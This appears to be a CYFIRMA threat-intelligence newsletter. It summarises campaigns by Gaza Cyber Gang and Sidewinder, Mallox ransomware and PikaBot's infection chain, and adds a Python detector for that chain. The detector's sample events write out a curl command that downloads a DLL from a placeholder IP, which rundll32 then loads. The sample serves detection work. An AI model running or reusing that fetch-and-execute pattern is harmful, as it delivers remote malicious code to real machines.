CYFIRMA: Cybersecurity Dossier
Threat Actor in Focus: Gaza Cyber Gang Employed Modified Version of Pierogi Malware to Target Palestine and Israel
Recently the Gaza Cyber Gang, a pro-Hamas threat actor, has been observed targeting Palestinian entities using an updated backdoor called Pierogi++. This updated malware, so named by researchers, differs from its predecessors in being implemented in C++ rather than Delphi or Pascal. Security researchers observed a consistent pattern of targeting Palestinian entities in the group’s recent activities, unchanged since the onset of the Israel-Hamas conflict. The group has been active since at least 2012. The Gaza Cyber Gang has a history of targeting the Middle East, specifically Israel and Palestine, employing spear-phishing as its primary method of initial access. Its arsenal includes various malware families such as BarbWire, DropBook, LastConn, Micropsia, and more.
Conventional Threat Intelligence: A Relic in the Evolving Cyber Landscape?
In today’s cybersecurity world, Conventional Threat Intelligence (CTI) is facing an existential crisis. Once a cornerstone of organizational defence, its effectiveness is waning due to several factors that render it ill-suited to the modern threat landscape. Firstly, the rapid evolution of cyber threats outpaces the capabilities of Conventional Threat Intelligence, which relies heavily on known signatures and historical data. Polymorphic malware, zero-day exploits, and fileless attacks, all hallmarks of modern threats, deftly evade detection by these traditional methods. Secondly, advanced threats, such as Advanced Persistent Threats (APTs), are designed to bypass signature-based detection, rendering Conventional Threat Intelligence ineffective against these sophisticated adversaries.
From Macro to Payload: Decrypting the Sidewinder Cyber Intrusion Tactics
This report delves into a recent campaign involving a malicious Word document equipped with an embedded macro, unravelling a sophisticated cyber threat orchestrated by the Sidewinder group, possibly to target Nepalese government officials. The threat begins with a likely spear-phishing email delivering a malicious Word document. Once the document is downloaded and opened, the victim is lured into enabling macros, and the embedded macro executes. This triggers a complex sequence of events, involving the creation and execution of various scripts and the establishment of persistence mechanisms. The analysis uncovers a multi-stage attack designed to hide its activities, establish persistence, and execute malicious payloads.
CYFIRMA Industry Report: INFORMATION TECHNOLOGY
Welcome to the CYFIRMA infographic industry report, where we delve into the external threat landscape of the information technology industry over the past three months. This report provides valuable insights and data-driven statistics, delivering a concise analysis of attack campaigns, phishing telemetry, and ransomware incidents targeting the information technology industry.
We aim to present an industry-specific overview in a convenient, engaging, and informative format. Leveraging our cutting-edge platform telemetry and the expertise of our analysts, we bring you actionable intelligence to stay ahead in the cybersecurity landscape. For the purpose of these reports, we leverage the following data from our platform.
Ransomware of the Week
The CYFIRMA Research and Advisory Team has found Mallox ransomware while monitoring various underground forums as part of our Threat Discovery Process. Mallox is a ransomware threat that has been operational since its appearance in 2021. Mallox ransomware typically gains initial access by exploiting vulnerabilities in publicly exposed services, with a specific emphasis on MS-SQL (Microsoft SQL Server) and ODBC (Open Database Connectivity) interfaces. It specifically targets unpatched instances of older remote code execution (RCE) vulnerabilities such as CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.
Trending Malware of the Week
This week “PikaBot” is trending. In recent days, researchers have detected PikaBot, a fresh malware family that surfaced in early 2023. Its distribution method has shifted to malvertising, marking a departure from its previous mode of dissemination through malspam campaigns. In earlier attacks, the typical PikaBot distribution chain involved an email with a link to an external website, leading users to download malicious JavaScript from a zip archive. The JavaScript establishes a random directory structure, retrieves the payload via the curl utility, and executes the resulting DLL through rundll32. PikaBot's core module is injected into the legitimate SearchProtocolHost.exe process, and its loader employs indirect syscalls to conceal the injection, enhancing the malware's stealthiness.
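The earlier distribution chain described above (script host, then curl fetching a DLL into a random directory, then rundll32 loading it) leaves a distinctive parent-child trail in process-creation telemetry. The following detection logic is an added example, not CYFIRMA's code or any real product rule; the event records and the paths, PIDs and URL in them are constructed, and it covers only the process chain, not the later SearchProtocolHost.exe injection.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (hypothetical, not real telemetry);
# the fields mirror what an EDR or Sysmon process-create feed would carry.
EVENTS = [
    {"pid": 100, "ppid": 50, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\Downloads\invoice.js"},
    {"pid": 300, "ppid": 200, "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Users\u\AppData\Local\Temp\Ab3kQ\Zx9p\load.dll http://203.0.113.10/load"},
    {"pid": 400, "ppid": 200, "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\Ab3kQ\Zx9p\load.dll,Enter"},
    # Benign rundll32 use of a system DLL launched from explorer: must not alert.
    {"pid": 500, "ppid": 100, "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def dll_from_rundll32(cmdline):
    """Return the DLL path from 'rundll32.exe <dll>,<entry>' (None if not parseable)."""
    m = re.match(r'^\s*"?rundll32(?:\.exe)?"?\s+"?([^",]+?)"?\s*(?:,|$)', cmdline, re.I)
    return m.group(1) if m else None

def curl_output_path(cmdline):
    """Return the file curl was told to write with -o/--output, or None."""
    m = re.search(r'(?:^|\s)(?:-o|--output)\s+"?([^"\s]+)', cmdline)
    return m.group(1) if m else None

def detect_pikabot_chain(events):
    """Flag rundll32 loading a non-system DLL when its parent is a script host,
    and record whether a sibling curl.exe downloaded that same DLL."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if e["image"].lower() != "rundll32.exe":
            continue
        dll = dll_from_rundll32(e["cmdline"])
        if dll is None or dll.lower().startswith(SYSTEM_DIRS):
            continue  # ordinary rundll32 use of a system DLL
        parent = by_pid.get(e["ppid"])
        if parent is None or parent["image"].lower() not in SCRIPT_HOSTS:
            continue
        fetched = any(s["image"].lower() == "curl.exe" and
                      (curl_output_path(s["cmdline"]) or "").lower() == dll.lower()
                      for s in children[parent["pid"]])
        findings.append({"rundll32_pid": e["pid"], "script_host_pid": parent["pid"],
                         "dll": dll, "downloaded_by_curl": fetched})
    return findings
```

Running `detect_pikabot_chain(EVENTS)` yields one finding for PID 400 with `downloaded_by_curl` set, while the explorer-launched shell32.dll case is ignored; in production the same logic would consume live process-create events rather than the embedded list.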
CYFIRMA is a threat discovery and cyber-intelligence company with the world’s first platform that can deliver predictive cyber-intelligence. We combine cyber-intelligence with attack surface discovery and digital risk protection to deliver early warning, personalized, contextual, outside-in, and multi-layered insights. We have built the next generation of AI-powered threat intelligence platform, called External Threat Landscape Management (ETLM), to provide cyber defenders with the hacker’s view and help clients prepare for impending attacks.
Visit www.cyfirma.com